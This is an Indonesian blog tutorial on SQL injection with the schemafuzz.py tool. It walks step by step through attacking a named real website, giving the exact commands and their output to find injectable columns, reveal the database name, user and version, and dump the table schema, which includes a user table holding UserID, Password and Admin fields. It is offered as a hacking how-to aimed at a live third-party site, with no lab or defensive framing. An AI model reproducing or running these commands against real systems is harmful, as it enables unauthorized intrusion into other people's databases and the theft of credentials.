Sunday 14 April 2013

Home » Hacking » Tutorial SQLi Injection Dengan Schemafuzz

Tutorial SQLi Injection Dengan Schemafuzz

By dxCyberz ISD   Posted at  Sunday, April 14, 2013   Hacking No comments

1. Download Python : http://www.python.org/download/

2. Download Schemafuzz : http://www.beenuarora.com/code/schemafuzz.py
3.CMD

Dg cmd masuk ke folder tempat schemafuzz.py berada...
Awali pertintah dengan format:
schemafuzz.py -u "url target" --perintah
List perintah ada dibawah...


1.Cari target
Misal: http://www.ditplb.or.id/profile.php?id=1

2.Masukkan perintah untuk mencari colom
Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1"; --findcol
Maka keluar:
[+] URL: http://www.ditplb.or.id/profile.php?id=1--
[+]
Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL:
http://www.ditplb.or.id/profile.php?id=1...CT+0,1,2--

[+] darkc0de
URL: http://www.ditplb.or.id/profile.php?id=1...1,darkc0de
[-] Done!



Berarti kita gunain
http://www.ditplb.or.id/profile.php?id=1...1,darkc0de
untuk inject

3.Cari database dg command --dbs
Misal : schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--dbs
Maka keluar:
[+] URL:
http://www.ditplb.or.id/profile.php?id=1...darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:39:32

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb
User: t15618_pl...@localhost

Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] t15618_plb


[-] 20:39:39

[-] Total URL Requests 3

[-] Done


keliatan kan nama databasenya ??? t15618_plb

4.Cari nama table dalam database
Misal: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D namadatabase
Jadinya: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D t15618_plb
Maka keluar:

[+] URL:
http://www.ditplb.or.id/profile.php?id=1...darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_pl...@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done

Sumber : http://forum.indonesiansecuritydown.org/thread-28.html

About the Author

Nulla sagittis convallis arcu. Sed sed nunc. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.
View all posts by: BT9

0 comments:

Back to top ↑
Connect with Us

Site Rank

Total Pageviews

© 2013 dxCyberz Blog. WP Mythemeshop Converted by Bloggertheme9
Blogger templates. Proudly Powered by Blogger.